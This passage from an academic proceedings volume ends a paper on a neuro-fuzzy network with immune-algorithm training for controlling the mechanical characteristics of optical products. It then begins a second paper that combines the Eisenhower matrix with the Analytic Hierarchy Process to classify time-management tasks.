$w_{11}^{5}=1,\ w_{12}^{5}=0,\ w_{21}^{5}=0,\ w_{22}^{5}=1,\ w_{31}^{5}=1,\ w_{32}^{5}=0,\ w_{41}^{5}=0,\ w_{42}^{5}=1$
$w_{11}^{6}=1,\ w_{12}^{6}=0,\ w_{21}^{6}=0,\ w_{22}^{6}=1,\ w_{31}^{6}=0,\ w_{32}^{6}=1,\ w_{41}^{6}=1,\ w_{42}^{6}=0$
$w_{11}^{7}=1,\ w_{12}^{7}=0,\ w_{21}^{7}=0,\ w_{22}^{7}=1,\ w_{31}^{7}=1,\ w_{32}^{7}=0,\ w_{41}^{7}=1,\ w_{42}^{7}=0$
$w_{11}^{8}=0,\ w_{12}^{8}=1,\ w_{21}^{8}=1,\ w_{22}^{8}=0,\ w_{31}^{8}=0,\ w_{32}^{8}=1,\ w_{41}^{8}=0,\ w_{42}^{8}=1$
$w_{11}^{9}=0,\ w_{12}^{9}=1,\ w_{21}^{9}=1,\ w_{22}^{9}=0,\ w_{31}^{9}=1,\ w_{32}^{9}=0,\ w_{41}^{9}=0,\ w_{42}^{9}=1$
$w_{11}^{10}=0,\ w_{12}^{10}=1,\ w_{21}^{10}=1,\ w_{22}^{10}=0,\ w_{31}^{10}=0,\ w_{32}^{10}=1,\ w_{41}^{10}=1,\ w_{42}^{10}=0$
$w_{11}^{11}=1,\ w_{12}^{11}=0,\ w_{21}^{11}=1,\ w_{22}^{11}=0,\ w_{31}^{11}=0,\ w_{32}^{11}=1,\ w_{41}^{11}=1,\ w_{42}^{11}=0$
$w_{11}^{12}=0,\ w_{12}^{12}=1,\ w_{21}^{12}=0,\ w_{22}^{12}=1,\ w_{31}^{12}=1,\ w_{32}^{12}=0,\ w_{41}^{12}=0,\ w_{42}^{12}=1$
$w_{11}^{13}=0,\ w_{12}^{13}=1,\ w_{21}^{13}=0,\ w_{22}^{13}=1,\ w_{31}^{13}=1,\ w_{32}^{13}=0,\ w_{41}^{13}=1,\ w_{42}^{13}=0$
$w_{11}^{14}=0,\ w_{12}^{14}=1,\ w_{21}^{14}=1,\ w_{22}^{14}=0,\ w_{31}^{14}=1,\ w_{32}^{14}=0,\ w_{41}^{14}=1,\ w_{42}^{14}=0$
$w_{11}^{15}=0,\ w_{12}^{15}=1,\ w_{21}^{15}=0,\ w_{22}^{15}=1,\ w_{31}^{15}=0,\ w_{32}^{15}=1,\ w_{41}^{15}=1,\ w_{42}^{15}=0$
$w_{11}^{16}=1,\ w_{12}^{16}=0,\ w_{21}^{16}=1,\ w_{22}^{16}=0,\ w_{31}^{16}=1,\ w_{32}^{16}=0,\ w_{41}^{16}=0,\ w_{42}^{16}=1$
The third layer calculates the output membership functions based on min neurons:

$$\mu_{\tilde C_r}(x, z) = w_r \min\{\mu_{\tilde A_r}(x), \mu_{\tilde B_r}(z)\}, \quad z \in \overline{1,3},\ r \in \overline{1,16}, \qquad (9)$$

where $w_r = F_r$.

In the fourth layer, the membership functions of the final output are calculated based on max neurons:

$$y_z = \mu_{\tilde C}(x, z) = \max_{r} \left\{ w_r^{z}\, \mu_{\tilde C_r}(x, z) \right\}, \quad z \in \overline{1,3},\ r \in \overline{1,16}, \qquad (10)$$

with the binary output weights

$w_1^1=1,\ w_2^1=0,\ w_3^1=0,\ w_4^1=0,\ w_5^1=0,\ w_6^1=0,\ w_7^1=1,\ w_8^1=0,\ w_9^1=0,\ w_{10}^1=1,\ w_{11}^1=1,\ w_{12}^1=0,\ w_{13}^1=1,\ w_{14}^1=1,\ w_{15}^1=0,\ w_{16}^1=0$
$w_1^2=0,\ w_2^2=1,\ w_3^2=1,\ w_4^2=0,\ w_5^2=0,\ w_6^2=0,\ w_7^2=0,\ w_8^2=1,\ w_9^2=0,\ w_{10}^2=0,\ w_{11}^2=0,\ w_{12}^2=0,\ w_{13}^2=0,\ w_{14}^2=0,\ w_{15}^2=0,\ w_{16}^2=0$
$w_1^3=0,\ w_2^3=0,\ w_3^3=0,\ w_4^3=1,\ w_5^3=1,\ w_6^3=1,\ w_7^3=0,\ w_8^3=0,\ w_9^3=1,\ w_{10}^3=0,\ w_{11}^3=0,\ w_{12}^3=1,\ w_{13}^3=0,\ w_{14}^3=0,\ w_{15}^3=1,\ w_{16}^3=1$

Thus, the mathematical model of the artificial fuzzy network based on min–max neurons is presented in the form:

$$y_z = \mu_{\tilde C}(x, z) = \max_{r \in \overline{1,16}} \left\{ w_r^{z} w_r \min\left\{ \min_{i \in \overline{1,4}} \max_{j \in \overline{1,2}} \left\{ w_{ij}^{r} \mu_{\tilde A_{ij}}(x_i) \right\},\ \mu_{\tilde B_r}(z) \right\} \right\}, \quad z \in \overline{1,3}. \qquad (11)$$

To make a decision on choosing the action that changes the mechanical characteristics of optical products, the maximum-membership method is used for model (11):

$$z^* = \arg\max_{z} y_z = \arg\max_{z} \mu_{\tilde C}(x, z), \quad z \in \overline{1,3}. \qquad (12)$$
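As a hedged illustration of how the binary weight masks of layers two and four encode the rule base, the sketch below derives them from the RULES table and performs the forward pass of model (11). It reuses gauss_mf and RULES from the earlier sketches; it is not the authors' implementation.

```python
def rule_masks(rules):
    """Binary weights of model (11), derived from the rule table:
    w2[r][i][j] selects term j+1 of input i in rule r (second layer);
    w4[z][r] routes rule r to output class z+1 (fourth layer)."""
    w2 = [[[1 if terms[i] == j + 1 else 0 for j in range(2)]
           for i in range(4)] for terms, _ in rules]
    w4 = [[1 if k == z + 1 else 0 for _, k in rules] for z in range(3)]
    return w2, w4

def forward(x, m, s, rules):
    """Forward pass of the min-max network, Eqs. (6)-(12)."""
    w2, w4 = rule_masks(rules)
    mu = []
    for xi, mi, si in zip(x, m, s):      # first layer, Eqs. (6)-(7)
        g = gauss_mf(xi, mi, si)
        mu.append((g, 1.0 - g))
    fire = [min(max(w2[r][i][j] * mu[i][j] for j in range(2))
                for i in range(4))
            for r in range(len(rules))]  # second layer, Eq. (8)
    # Third layer: w_r = F_r = 1 and mu_Br(z) = [z = k_r], which the
    # binary mask w4 already encodes, so Eqs. (9)-(10) reduce to:
    y = [max(w4[z][r] * fire[r] for r in range(len(rules)))
         for z in range(3)]              # fourth layer
    return y.index(max(y)) + 1           # Eq. (12)
```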
2.3 Selection of Criteria for Evaluating the Effectiveness of the Mathematical Model of the Artificial Fuzzy Control Network of Mechanical Characteristics of Optical Products

To evaluate the parametric identification of the mathematical model of the artificial fuzzy network (11), the following criteria have been selected:

• the accuracy criterion, which means choosing parameter values $\theta = (m_{11}, m_{21}, m_{31}, m_{41}, \sigma_{11}, \sigma_{21}, \sigma_{31}, \sigma_{41})$ that minimize the mean squared error (the difference between the model output and the desired output):

$$F = \frac{1}{3P} \sum_{p=1}^{P} \sum_{z=1}^{3} (y_{pz} - d_{pz})^2 \to \min_{\theta}, \qquad (13)$$

where $d_{pz}$ is the response received from the control object, $d_{pz} \in \{0, 1\}$,
$y_{pz}$ is the response received from the model, and $P$ is the number of test implementations;

• the reliability criterion, which means choosing parameter values $\theta = (m_{11}, m_{21}, m_{31}, m_{41}, \sigma_{11}, \sigma_{21}, \sigma_{31}, \sigma_{41})$ that minimize the probability of making a wrong decision (a mismatch between the model output and the desired output):

$$F = \frac{1}{P} \sum_{p=1}^{P} \left[ \arg\max_{z \in \overline{1,3}} y_{pz} \ne \arg\max_{z \in \overline{1,3}} d_{pz} \right] \to \min_{\theta}, \qquad (14)$$

$$\left[ \arg\max_{z \in \overline{1,3}} y_z \ne \arg\max_{z \in \overline{1,3}} d_{pz} \right] = \begin{cases} 1, & \arg\max_{z \in \overline{1,3}} y_z \ne \arg\max_{z \in \overline{1,3}} d_{pz}, \\ 0, & \arg\max_{z \in \overline{1,3}} y_z = \arg\max_{z \in \overline{1,3}} d_{pz}; \end{cases}$$

• the performance criterion, which means choosing parameter values $\theta = (m_{11}, m_{21}, m_{31}, m_{41}, \sigma_{11}, \sigma_{21}, \sigma_{31}, \sigma_{41})$ that minimize the computational complexity:

$$F = T \to \min_{\theta}. \qquad (15)$$
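The accuracy and reliability criteria (13) and (14) can be computed directly from model outputs and desired outputs; a minimal Python sketch follows. The function name and argument layout are illustrative assumptions, not part of the paper.

```python
def evaluate(Y, D):
    """Accuracy criterion (13) and reliability criterion (14) for model
    outputs Y and desired outputs D, both given as P lists of 3 values."""
    P = len(Y)
    mse = sum((y - d) ** 2
              for yp, dp in zip(Y, D)
              for y, d in zip(yp, dp)) / (3 * P)
    wrong = sum(yp.index(max(yp)) != dp.index(max(dp))
                for yp, dp in zip(Y, D)) / P
    return mse, wrong
```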
2.4 Identification of Parameters of the Mathematical Model of the Artificial Neuro-Fuzzy Network of Control of Mechanical Characteristics of Optical Products on the Basis of the Backpropagation Algorithm in Batch Mode

Identification of the parameters of the mathematical model (11) involves the following steps:

1. Initialization of the mathematical expectations $m_{ij}$ and standard deviations $\sigma_{ij}$, $i \in \overline{1,4}$, $j \in \overline{1,2}$, by means of a uniform distribution on the interval (0, 1).

2. Setting the training set $\{(x^p, d^p) \mid x^p \in R^4,\ d^p \in \{0,1\}^3\}$, $p \in \overline{1,P}$, where $x^p$ is the $p$-th training input vector, $d^p$ is the $p$-th training output vector, and $P$ is the cardinality of the training set. Iteration number $n = 1$.

3. Calculation of the output signal according to model (11) (forward pass):

$$y_{pz} = \mu_{\tilde C}(x^p, z) = \max_{r \in \overline{1,16}} \left\{ w_r^{z} w_r \min\left\{ \min_{i \in \overline{1,4}} \max_{j \in \overline{1,2}} \left\{ w_{ij}^{r} \mu_{\tilde A_{ij}}(x_{pi}) \right\},\ \mu_{\tilde B_r}(z) \right\} \right\}, \quad z \in \overline{1,3}.$$

4. Calculation of the artificial neural network (ANN) error energy based on criterion (13):

$$E = \frac{1}{3P} \sum_{p=1}^{P} \sum_{z=1}^{3} (y_{pz} - d_{pz})^2.$$

5. Adjustment of the parameters of the condition membership functions of model (11) (backward pass):

$$m_{i1} = m_{i1} - \eta \frac{\partial E}{\partial m_{i1}}, \quad \sigma_{i1} = \sigma_{i1} - \eta \frac{\partial E}{\partial \sigma_{i1}}, \quad i \in \overline{1,4},$$

where $\eta$, $0 < \eta < 1$, is a parameter that determines the training speed (with a large value of $\eta$ training is faster, but the risk of arriving at a wrong solution increases).

6. Checking the stopping condition. If $E > \varepsilon$, then $n = n + 1$ and there is a transition to step 3. The value of $\varepsilon$ is determined experimentally.
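The paper trains by backpropagation, but the analytic derivatives of the min–max model (11) are not reproduced in this excerpt, so the sketch below substitutes finite-difference gradients as a stand-in for step 5. Here `loss` is a hypothetical callback computing the error energy E of Eq. (13) over the whole training set for a given parameter vector.

```python
def batch_step(theta, loss, eta=0.1, h=1e-5):
    """One batch-mode update of theta = (m11,...,m41, s11,...,s41).
    The gradient of E (Eq. (13)) is approximated by forward finite
    differences; returns the updated parameters and the pre-update error."""
    base = loss(theta)
    new_theta = []
    for i, t in enumerate(theta):
        probe = list(theta)
        probe[i] += h
        grad_i = (loss(probe) - base) / h
        new_theta.append(t - eta * grad_i)
    return new_theta, base
```

In use, one would iterate batch_step until the returned error falls below the experimentally chosen threshold ε, mirroring step 6.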
2.5 Identification of Parameters of the Mathematical Model of the Artificial Neuro-Fuzzy Network of Control of Mechanical Characteristics of Optical Products on the Basis of the Immune Algorithm

The authors have proposed an immune algorithm called the "modified artificial immune network" (MAIN). The essence of the modification is that at the compression stage the neighborhoods are calculated only for those cells of the compressed set whose value of the cost function (objective function) is less than the best average value over all iterations, which reduces the computational complexity of the algorithm.

Identification of the parameters of the mathematical model (11) on the basis of the proposed immune algorithm involves the following steps.

1. Initialization.
• Setting the mutation parameter $\alpha > 0$ (the greater $\alpha$, the lower the mutation amplitude) and the compression threshold $\varepsilon > 0$.
• Setting the maximum number of iterations $N$, the population size $K$, the cell length $M$, the number of clones $L_C$, and the minimum and maximum values of the cell components $x_j^{\min}$, $x_j^{\max}$, $j \in \overline{1,M}$.
• Setting the cost function (objective function) based on (13): $F(x) \to \min_x$, where $x$ is a cell (a real-valued vector).
• Creating an initial population $P$:
  – Cell number $k = 1$, $P = \emptyset$.
  – Randomly creating a cell: $x^k = (x_{k1}, \ldots, x_{kM})$, $x_{kj} = x_j^{\min} + (x_j^{\max} - x_j^{\min})\, U(0,1)$, where $U(0,1)$ is a function that returns a uniformly distributed random number in $[0, 1]$.
  – If $x^k \notin P$, then $P = P \cup \{x^k\}$, $k = k + 1$.
  – If $k \le K$, then go to step 1.4.2.
• Determining the best cell by the objective function: $x^* = \arg\min_{x^k} F(x^k)$.
• The best average value over all iterations: $F^{best} = \frac{1}{K} \sum_{k=1}^{K} F(x^k)$.

2. Iteration number $n = 0$.

3. Calculation of the affinity of the cells of the population $P$:

$$\Phi(x^k) = 1 - \frac{F(x^k) - \min_{i \in \overline{1,K}} F(x^i)}{\max_{i \in \overline{1,K}} F(x^i) - \min_{i \in \overline{1,K}} F(x^i)}, \quad \Phi(x^k) \in [0, 1], \quad k \in \overline{1,K}.$$
4. Determining the best cell by the objective function: $k^* = \arg\min_k F(x^k)$.

5. If $F(x^{k^*}) < F(x^*)$, then $x^* = x^{k^*}$.

6. Calculating the average cost: $F^{source} = \frac{1}{K} \sum_{k=1}^{K} F(x^k)$.

7. Creating the set $H$ of the best mutated clones:
• $k = 1$, $H = \emptyset$.
• Creating a set of clones $\tilde P^k = \{\tilde x^{kl}\}$ for the cell $x^k$ of the population.
• Creating the set $\hat P^k$ of mutated clones:
  – Clone number $l = 1$, $\hat P^k = \emptyset$.
  – $\hat x_{klj} = \tilde x_{klj} + \frac{1}{\alpha}\, e^{-\Phi(\tilde x^{kl})}\, N(0, 1)$, $j \in \overline{1,M}$, where $N(0,1)$ is a function that returns a standard normally distributed random number. The parameter $\alpha$ can be defined as $\alpha^{-1} = \delta (x_j^{\max} - x_j^{\min})$, $0 < \delta < 1$.
  – $\hat x_{klj} = \max\{x_j^{\min}, \hat x_{klj}\}$, $\hat x_{klj} = \min\{x_j^{\max}, \hat x_{klj}\}$, $j \in \overline{1,M}$.
  – $\hat P^k = \hat P^k \cup \{\hat x^{kl}\}$.
  – If $l < L_C$, then $l = l + 1$, go to step 7.3.2.
• Determining the best element of the set $\hat P^k$ by the objective function: $h^k = \arg\min_{\hat x^{kl}} F(\hat x^{kl})$.
• $H = H \cup \{h^k\}$.
• If $k < K$, then $k = k + 1$, go to step 7.2.

8. Calculation of the average value: $F^{mutate} = \frac{1}{K} \sum_{k=1}^{K} F(h^k)$.
9. If $F^{mutate} \ge F^{source}$, then go to step 7.

10. If $F^{source} < F^{best}$, then $F^{best} = F^{source}$.

11. Compression of the set $H$ and replacement of the cells of the population $P$ by elements of the set $H$:
• $k = 1$, $m = 1$.
• If $F(h^m) > F^{best}$, then go to step 11.5.
• Formation of the $\varepsilon$-neighborhood of the $m$-th element of the set $H$: $U_{h^m,\varepsilon} = \{h^l \mid \rho(h^m, h^l) \le \varepsilon,\ l \in \overline{1,K}\}$, where $\rho$ is the distance between $h^m$ and $h^l$ (for example, the Euclidean distance).
• If $U_{h^m,\varepsilon} = \emptyset$ or $h^m$ is the best element of $U_{h^m,\varepsilon}$, then $x^k = h^m$, $k = k + 1$.
• If $m < K$, then $m = m + 1$, go to step 11.2.

12. If $k = K$, then go to step 14.

13. Initialization of the remaining cells of the population $P$:
• $x^k = (x_{k1}, \ldots, x_{kM})$, $x_{kj} = x_j^{\min} + (x_j^{\max} - x_j^{\min})\, U(0,1)$.
• If $k < K$, then $k = k + 1$, go to step 13.1.
14. If $n < N - 1$, then $n = n + 1$, go to step 3. The result is $x^*$ (an illustrative sketch of the clone-mutation step is given after the discussion below).

2.6 Numerical Research

A numerical study of the proposed mathematical model of the artificial fuzzy network and of a conventional multilayer perceptron has been conducted in Matlab using the Deep Learning Toolbox (to identify the parameters of the conventional multilayer perceptron model based on backpropagation), the Global Optimization Toolbox (to identify the parameters of the network model (11) based on the immune algorithm, the modified artificial immune network (MAIN)), and the Fuzzy Logic Toolbox (to identify the parameters of the proposed artificial fuzzy network model (11) based on backpropagation).

Table 1 presents the computational complexity, RMS errors and probabilities of incorrect decisions in controlling the mechanical properties of optical products, obtained with STATISTICA Neural Networks (the StatSoft neural network package, which implements the whole set of neural network data analysis methods) for an artificial neural network of the multilayer perceptron (MLP) type with backpropagation (BP) and with the immune algorithm "modified artificial immune network" (MAIN), and for the proposed model (11) with backpropagation (BP) and with MAIN, respectively. The MLP had 2 hidden layers (each consisting of 8 neurons, as does the input layer).

According to Table 1, the best results are given by model (11) with parameter identification based on MAIN. Based on the experiments, the following conclusions can be drawn. The parameter identification procedure based on the immune algorithm "modified artificial immune network" (MAIN) is more effective than training based on backpropagation owing to the reduced probability of hitting a local extremum, the automatic selection of the structure of the artificial fuzzy network model, and the parallel information processing technology.

As a result of the research, a comparative analysis of the results obtained with the artificial fuzzy control network of mechanical characteristics of optical products against those obtained with an alternative neural network, a multilayer perceptron with backpropagation (which has proven itself in high-precision control), has shown a significant simplification, a reduction of the root mean square error from 28.8–33.2 to 9.3–11.5, and a reduction of the probability of incorrect decisions from 0.089–0.112 to 0.008–0.013.
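For concreteness, the affinity-proportional clone mutation of step 7 of the MAIN algorithm above can be sketched in a few lines of Python. This is an illustration, not the Matlab code used in the experiments; the function name and argument layout are assumptions.

```python
import math
import random

def mutate_clone(clone, affinity, delta, bounds):
    """Affinity-proportional mutation of one clone (step 7 of MAIN):
    x'_j = x_j + (1/alpha) * exp(-Phi) * N(0, 1), with
    1/alpha = delta * (x_max_j - x_min_j), clipped to the bounds."""
    mutated = []
    for xj, (lo, hi) in zip(clone, bounds):
        step = delta * (hi - lo) * math.exp(-affinity) * random.gauss(0.0, 1.0)
        mutated.append(min(hi, max(lo, xj + step)))
    return mutated
```

Note how the step size shrinks exponentially with affinity: clones of good (high-affinity) cells are perturbed only slightly, while clones of poor cells explore more widely.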
Table 1. Computational complexity, standard error, and probability of incorrect decisions made to control the mechanical characteristics of optical products

Model and method of parameter identification | RMS error | Probability of a wrong decision | Computational complexity
Normal MLP with BP in serial mode | 33.2 | 0.112 | T = PN
Normal MLP with MAIN without concurrency | 28.8 | 0.089 | T = PNI
Author's model (11) with BP in batch mode | 11.5 | 0.013 | T = N
Author's model (11) with MAIN with parallelism | 9.3 | 0.008 | T = N
3 Conclusions

1. To solve the problem of improving the efficiency of control of the mechanical characteristics of optical products, appropriate methods of artificial intelligence have been studied. These studies have shown that, to date, the most effective approach is the use of artificial neural networks in combination with fuzzy inference and an immune algorithm.

2. The proposed approach to the intellectual control of the mechanical characteristics of optical products automates this control; represents the knowledge about controlling the characteristics of optical products as rules that are easily accessible to human understanding; and reduces the computational complexity, the RMS error (by 2.8–3.1 times) and the probability of making a wrong decision (by 7–11 times) by automatically selecting the structure of the artificial neuro-fuzzy network model, reducing the probability of hitting a local extremum, and using parallel information processing for the immune algorithm and batch backpropagation.

3. The developed method of intellectual control of the mechanical characteristics of optical products can be used in various information and measuring systems, for example, in the information and measurement unit implemented in the multiprobe system for nanometric measurements of geometrical and mechanical properties of microsystem devices [3].
References 1. Zheng, T., Ardolino, M., Bacchetti, A., Perona, M.: The applications of Industry 4.0 technologies in manufacturing context: a systematic literature review. Int. J. Prod. Res. 59(6), 1922–1954 (2020). https://doi.org/10.1080/00207543.2020.1824085 2. Grechana, O., Kovalenko, Yu., Bondarenko, M.: Gradient microstructures formed by electron flow on the optical glass. In: Abstract of the IX International Conference on the Complex Safety of Technological Processes and Systems, Chernigiv (2019)
3. Andriienko, O., Bilokin, S., Bondarenko, M.: Features of creation of multiprobe system for nanometric measurements of geometrical and mechanical properties of surfaces of microsystem devices. Mach. Technol. Mater. 14(6), 268–271 (2020)
4. Tytarenko, V., Tychkov, D., Bilokin, S., Bondarenko, M., Andriienko, V.: Development of a simulation model of an information-measuring system of electrical characteristics of the functional coatings of electronic devices. Math. Model. 2, 68–71 (2020)
5. Du, K.-L., Swamy, K.M.S.: Neural Networks and Statistical Learning. Springer, London (2014). https://doi.org/10.1007/978-1-4471-7452-3
6. Fedorov, E., Nechyporenko, O., Utkina, T.: Forecast method for natural language constructions based on a modified gated recursive block. In: CEUR Workshop Proceedings, vol. 2604, pp. 199–214 (2020)
7. Zhang, Z., Tang, Z., Vairappan, C.: A novel learning method for Elman neural network using local search. Neural Inf. Process. – Lett. Rev. 11(8), 181–188 (2007)
8. Dey, R., Salem, F.M.: Gate-variants of gated recurrent unit (GRU) neural networks. arXiv:1701.05923 (2017)
9. Cho, K., van Merrienboer, B., Gulcehre, C., Bougares, F., Schwenk, H., Bengio, Y.: Learning phrase representations using RNN encoder-decoder for statistical machine translation. In: Proceedings of the 2014 Conference on Empirical Methods in Natural Language Processing (EMNLP), Doha, Qatar (2014)
10. Maass, W., Natschläger, T., Markram, H.: Real-time computing without stable states: a new framework for neural computation based on perturbations. Neural Comput. 14(11), 2531–2560 (2002)
11. Rotshtein, A., Shtovba, S., Mostav, I.: Fuzzy rule based innovation projects estimation. In: Proceedings of the Joint 9th IFSA World Congress and 20th NAFIPS International Conference, pp. 122–126 (2001)
12. Ruan, D.: Intelligent Hybrid Systems: Fuzzy Logic, Neural Networks, and Genetic Algorithms. Kluwer Academic Publishers, Boston (1997)
13. Abe, S.: Neural Networks and Fuzzy Systems: Theory and Application. Kluwer Academic Publishers, Boston (1997)
14. Tsoukalas, L.H., Uhrig, R.E.: Fuzzy and Neural Approaches in Engineering. John Wiley & Sons, New York (1997)
15. Balochian, S., Ebrahimi, E.: Parameter optimization via cuckoo optimization algorithm of fuzzy controller for liquid level control. J. Eng. 2013, 1–7 (2013)
16. Talbi, El.-G.: Metaheuristics: From Design to Implementation. Wiley, New Jersey (2009)
17. Fedorov, E., Lukashenko, V., Utkina, T., Lukashenko, A., Rudakov, K.: Method for parametric identification of Gaussian mixture model based on clonal selection algorithm. In: CEUR Workshop Proceedings, vol. 2353, pp. 41–55 (2019)
18. De Castro, L.N., Von Zuben, F.J.: An evolutionary immune network for data clustering. In: Proceedings of the Sixth Brazilian Symposium on Neural Networks (2000)
19. Brownlee, J.: Clever Algorithms: Nature-Inspired Programming Recipes. Brownlee, Melbourne (2012)
Information and Communication Technology in Management
Combined Method of Solving Time Management Tasks and Its Implementation in the Decision Support System

Anton Maksymov and Yurii Tryus
Cherkasy State Technological University, Cherkasy, Ukraine
{a.ye.maksymov.asp21,tryus}@chdtu.edu.ua
Abstract. Among the methods of time management, the Eisenhower matrix is widely used; its essence is to divide tasks into four degrees of importance: important-urgent, important-non-urgent, unimportant-urgent, unimportant-non-urgent. At the same time, it is sometimes quite difficult to determine exactly to which of the categories an input task belongs. Therefore, under these conditions, there is a need to create a method for classifying time management tasks according to the appropriate degrees of importance, and a convenient web-oriented decision support tool that implements it. In this research, the authors propose to use the Analytic Hierarchy Process (AHP) to compare the input time management tasks against the criteria of importance and urgency. The object of research is the methods of time management, in particular the Eisenhower matrix. The subject of research is the method of classifying input tasks into the Eisenhower matrix by degrees of importance using the AHP. The proposed method is implemented in a web-oriented resource, which provides online automation of the process of classifying time management tasks. The obtained experimental results confirm the expediency of using the authors' combination of the Eisenhower matrix method and the AHP to solve time management problems.

Keywords: Time management · decision-making · Analytic Hierarchy Process · Eisenhower matrix · classification of tasks · information technology for decision making
1 Introduction

Time is one of the most valuable human resources, and given its limited and unique nature, everyone should use it rationally. Here the science of time management comes to the rescue. Time management is the science of a set of methods and technologies for the optimal organization of time and the efficient use of it to perform current tasks, projects and calendar events [1].

One of the popular approaches to solving time management problems is the Eisenhower matrix, a method that uses the principles of importance and urgency to prioritize tasks and manage workload [1]. But the criteria for classifying tasks in this case are
quite abstract, so it becomes relevant to use the additional mathematical apparatus of decision-making methods to determine the priorities of tasks within each class.

The goal of the research is to develop a method of classifying input tasks into the Eisenhower matrix according to degrees of importance using the analytic hierarchy process, as well as to create a module for a web-oriented decision support system that implements this method.

Research Methods: analysis of the scientific and technical literature on the use of time management technologies together with decision-making methods; the analytic hierarchy process; the Eisenhower matrix.

Relevance of Research. In modern conditions of dynamic modernization and transformation, it becomes necessary to increase the adaptability of the organization and the speed of response to changes when planning the list of tasks to be solved and classifying them appropriately according to certain criteria. In this case, adaptability is an important competitiveness factor for a person planning their schedule. An important role is played by information technology, with the use of which it is possible to automate the relevant decision-making processes in solving time management problems.

Analysis of Recent Research and Publications. The problem of time management is always relevant. The works of such scientists as S. Covey, K. Bischof, R. Kiyosaki, A. Gast, P. Drucker, L. Seiwert, J. Cawley, K. Muller, T. Peters, F. Taylor and J. Knoblauch are devoted to the development and implementation of time management methods and technologies in the practice of organizations and enterprises [2]. We also highlight the publications of recent years devoted to the problems of building a time management system by such authors as Ch. Godefroy [3], G. Campbell [4], R. Davis [5] and S. Gopi [6].

Ukrainian scientists also actively study the problems of time management. In particular, O.V. Kendiukhov and K.Iu. Yahelska [7] studied the economic meaning of time and the role of the time factor in the development of the economic system. H.I. Yevtushenko and V.M. Derevianko [8] investigated the main causes of time loss and provided suggestions for improving the efficiency of time management. M.M. Petrushenko and T.V. Bondar [9] proposed an approach to the implementation of a corporate time management system. K.B. Kharuk, R.M. Skrynkovskyi and N.M. Krukevych [10] studied the formation of the concept of "time management" and proposed tools for diagnosing time management on the basis of the business indicators "efficiency" and "productivity". H.I. Pysarevska [11] substantiated methods of time inventory. N.V. Iziumtseva and V.V. Nedozhdii [12] considered the stages of building a time management system at an enterprise and justified the need for monitoring of working time. S.M. Makarenko, N.M. Oliinyk and K.I. Lushchyk [13] presented recommendations for improving time management and determining the optimal workload for employees.

The combination of the analytic hierarchy process and the Eisenhower matrix is found in scientific papers in terms of allocating auxiliary matrices (sub-quadrants) for the main Eisenhower matrix using the AHP with subsequent calculations [14]. A scientific work on combining the AHP and Simple Additive Weighting (SAW) methods for use in a decision support system based on the Eisenhower matrix to solve the problem of task accumulation, but using its own criteria for evaluating tasks, was also analyzed [15]. The
research also analyzed work applying benefit, opportunity, cost, risk (BOCR) analysis and the AHP to the Eisenhower matrix [16]. The authors' work proposes a simplified but no less effective approach without singling out auxiliary matrices and sub-criteria of the hierarchy. Instead, a method for classifying input tasks into the four classes of the Eisenhower matrix is proposed.
2 Materials and Methods

Decision-making is a special type of human activity aimed at choosing the best course of action among many options. The options are called alternatives. The choice of the best alternative is based on certain criteria [17].

The decision-making task (DMT) is a task that can be formulated in terms of "goals", "means" and "results" [17]. The decision-making task is defined as a pair ⟨A, K⟩, where A is the set of acceptable alternatives and K is the set of optimality criteria, which defines the concept of the best alternatives (K is the goal model). The solution of the task is a subset $A_{op} \subseteq A$ determined by the principle of optimality. If the principle of optimality is a set of contradictory criteria, one speaks of a multi-criteria decision-making task.

The classification of DMTs is carried out in two aspects [17]:

1. classification according to the description of the purpose of the DMT;
2. classification by the description of means, results and the connections between them.

An important result of research conducted within the normative theory of decision-making is the development of mathematical models that make it possible to find a solution to the task [18]. The mathematical model of a DMT is a formal description of its constituent elements (goals, means, results), as well as of the relationships between means and results.

In the case where the decision-making task can be represented as a hierarchical composition and a rating of alternative solutions can be applied, it is advisable to use the Analytic Hierarchy Process, a mathematical tool of the systematic approach to solving complex decision-making problems. This method was developed by the American mathematician Thomas Saaty [19]. The AHP is widely used in practice and actively developed by scientists around the world, and a large number of software products implementing it have been created. Along with mathematics, it is based on psychological aspects. The AHP allows a complex decision-making problem to be structured in a clear and rational way through a hierarchy (Fig. 1), and alternative solutions to be compared and quantified [19]. Therefore, the analytic hierarchy process is a systematized mathematical procedure for the hierarchical representation of the elements that determine the essence of a decision-making problem [19]. The method consists in decomposing the problem into simpler components and further processing the sequence of judgments of the decision maker, presented in the form of pairwise comparisons.

The classification task is a formalized problem that contains a set of objects (situations) which need to be divided in some way into classes that, in the classical case, do not intersect [20].
Fig. 1. Hierarchy of AHP
Formulation of the Problem. Let the tasks of time management be represented by a set of alternatives A = {a₁, a₂, …, aₙ}. These tasks must be divided into m classes C₁, C₂, …, Cₘ using the set of criteria K = {k₁, k₂, …, kₘ}. According to the Eisenhower matrix method, K is the set of degrees of importance of tasks [1], whose number in the classical method is m = 4. Accordingly, the decision maker (DM) uses the following criteria to evaluate the tasks: $k_1$ – important-urgent tasks (tasks that require an immediate solution), $k_2$ – important-non-urgent tasks (tasks that should be scheduled for a later date), $k_3$ – unimportant-urgent tasks (tasks that should be delegated to others), $k_4$ – unimportant-non-urgent tasks (tasks that should be postponed or deleted altogether).

If the number of tasks in the set A is more than 4, then to determine the priority of these tasks it is advisable to use the analytic hierarchy process [19], with the criteria having equal weight in the evaluation of tasks. To solve this problem, project management experts can be involved, who compare and evaluate alternatives according to the criteria using the Saaty scale [19].

The Solution of the Problem. Consider the method of solving the classification problem for time management tasks, which uses the AHP according to the criteria of the Eisenhower method to determine the priorities within each class. Since the criteria $k_i$ ($i = 1, 2, 3, 4$) are equivalent (their matrix of paired comparisons is the identity matrix), they are not compared by the AHP. Therefore, the alternatives from the set A are first compared according to criterion $k_1$ – "important-urgent tasks" – and analyzed for inclusion in the class of tasks $C_1$ according to the following procedure.

Let Q be a weight value from the interval (0, 1) that determines the inclusion of alternative $a_j$ in the corresponding class of tasks $C_i$ by criterion $k_i$ ($i = 1, 2, 3, 4$): if in the priority vector

$$W^{(i)} = \left(w_j^{(i)}\right)_{j=\overline{1,n}},$$

obtained by the AHP when comparing the alternatives [19], the corresponding value $w_j^{(i)} > Q$, then the alternative $a_j$ falls into the class of tasks $C_i$ with priority $w_j^{(i)}$ and is removed from further analysis by the other criteria; otherwise, the alternative $a_j$ remains in the set of alternatives (tasks) for further comparison by the next criterion $k_{i+1}$ ($i = 1, 2, 3$).

